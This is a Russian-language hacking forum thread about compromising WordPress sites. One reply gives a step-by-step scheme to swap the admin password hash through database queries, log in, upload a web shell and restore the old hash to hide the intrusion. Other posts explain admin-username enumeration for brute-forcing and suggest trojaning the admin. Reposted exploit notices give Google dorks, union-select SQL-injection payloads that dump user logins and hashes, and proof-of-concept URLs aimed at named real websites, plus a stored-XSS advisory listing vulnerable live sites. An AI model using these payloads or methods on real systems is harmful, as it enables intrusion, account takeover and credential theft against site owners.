WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Кто разобрался с вот этой уязвимостью? тыЦ Плагин много где установлен, но почему то страница upload.php при прямом открытие выдаёт: _RANDOM NUMBER
Как можно зайти под админом\залить шел, если 1)Есть доступ к бд = есть логи и пасс(мд5) админа 2)Версия движка 2.5.1 3)Секрет кей не дефолтный Спасибо заранее
1.Расшифровать пароль! 2.???? 3.PROFIT!!!11 Иных вариантов нет исходя из ваших данных. Можете протроянить админа и узнать пароль, не прибегая к расшифровке!
Моя бы схема выглядела так: 1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем! Заходим в БД. Пишем запрос Code: select password from users where id=1 Запоминаем/записываем хэшик. Далее запрашиваем Code: update users set password='NewPassword' where id=1 NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении 2) Проверяем, что у нашего юзверя сменился хэшик в БД. 3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать) 4) Так как мы внутри - льём шелл, например так 5) Из-под шелла или ещё где цепляемся в бд и делаем запрос Code: update users set password='OldPassword' where id=1 Где OldPassword = старый, сохранённый хэшик. З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)
Помошник брута Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла. PHP: http://domashenko.ru/wp-login.php Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет.... Введем логин "admin" и пароль к примеру "test", в результате получаем: Конечно не новшество, но мне частенько пригождается.
Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
вопрос, есть админка, темы и плагины нельзя с неё редактировать. какие еще методы есть чтоб залить шел? вп 3.4.1
fs real estate plugin SQL-Inj # Exploit Title: fs real estate plugin SQL-Inj # Date: Oct 2, 2012 # Exploit Author: z0mbyak # Vendor Homepage: find by yourself # Software Link: find by yourself # Version: don't know # Tested in: web # Dork: inurl:"marker_listings.xml?id" # Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- # PoC: http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- P.S. Кол-во колонок может отличаться... P.P.S. Мб, боян, по wp не работаю)
# Exploit Title: ripe-hd-player SQL-Inj # Date: 19.10.2012 # Exploit Author: ukrpunk # Vendor Homepage: find by yourself # Software Link: find by yourself # Version: don't know # Tested in: web # Dork:inurl:"/plugins/ripe-hd-player" # Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users-- # PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users--
Кто нибудь объяснит как раскрутить эту тему: PHP: ################################################################################### # Exploit Title: wordpress Count per Day Cross Site Scripting Vulnerability # # Google Dork:inurl:/wp-content/plugins/count-per-day # # Date: 08/24/2012 # # Author: Crim3R # # Version 3.2.3 # # Vendor Home : http://downloads.wordpress.org/plugin/count-per-day.3.2.3.zip # # Tested on: all # ################################################################################### $ $ Author will be not responsible for any damage. $ ################################################################################### ======================================== first notes.php is not restricted to admin and anyone can access it directty by browser => an attacker can add notes witch can be html codes => its Stored Xss goto WP-path/wp-content/plugins/count-per-day/notes.php in the notes section add html code and click Add D3M0 : http://www.christinedesavino.com/blog/wp-content/plugins/count-per-day http://www.dhakadakshinghsc.com/wp-content/plugins/count-per-day/ www.watansport.net/ara/wp-content/plugins/count-per-day/ ===============Crim3R@Att.Net=========== $home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir